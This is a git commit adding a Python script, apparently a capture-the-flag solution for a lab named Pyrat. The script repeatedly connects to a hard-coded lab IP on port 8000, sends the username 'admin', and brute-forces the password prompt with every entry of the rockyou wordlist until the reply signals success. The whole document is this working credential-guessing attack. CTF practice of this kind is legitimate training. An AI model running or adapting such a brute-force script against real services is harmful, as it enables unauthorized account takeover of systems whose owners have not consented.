initial commit

CTF/Pyrat/exploit.py

@@ -0,0 +1,53 @@
+import socket
+import gzip
+
+# Configuration
+target_ip = "10.10.96.19"   # Target IP
+target_port = 8000          # Target port
+password_wordlist = "/usr/share/wordlists/rockyou.txt.gz"  # Path to the password wordlist file
+
+def connect_and_send_password(password):
+    try:
+        client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        client_socket.connect((target_ip, target_port))
+        client_socket.sendall(b'admin\n')
+
+        response = client_socket.recv(1024).decode()
+        print(f"Server response after sending 'admin': {response}")
+
+        if "Password:" in response:
+            print(f"Trying password: {password}")
+            client_socket.sendall(password.encode() + b"\n")
+
+            response = client_socket.recv(1024).decode()
+
+            if "success" in response.lower() or "admin" in response.lower():
+                print(f"Server response for password '{password}': {response}")
+                return True
+            else:
+                print(f"Password '{password}' is incorrect or no response.")
+
+        return False
+
+    except Exception as e:
+        print(f"Error: {e}")
+        return False
+
+    finally:
+        client_socket.close()
+
+def fuzz_passwords():
+    with gzip.open(password_wordlist, "rt", encoding="latin-1") as file:  # Updated to use encoding="latin-1"
+        passwords = file.readlines()
+
+    for password in passwords:
+        password = password.strip()  # Remove any newline characters
+
+        if connect_and_send_password(password):
+            print(f"Correct password found: {password}")
+            break
+        else:
+            print(f"Password {password} was incorrect. Reconnecting...")
+
+if __name__ == "__main__":
+    fuzz_passwords()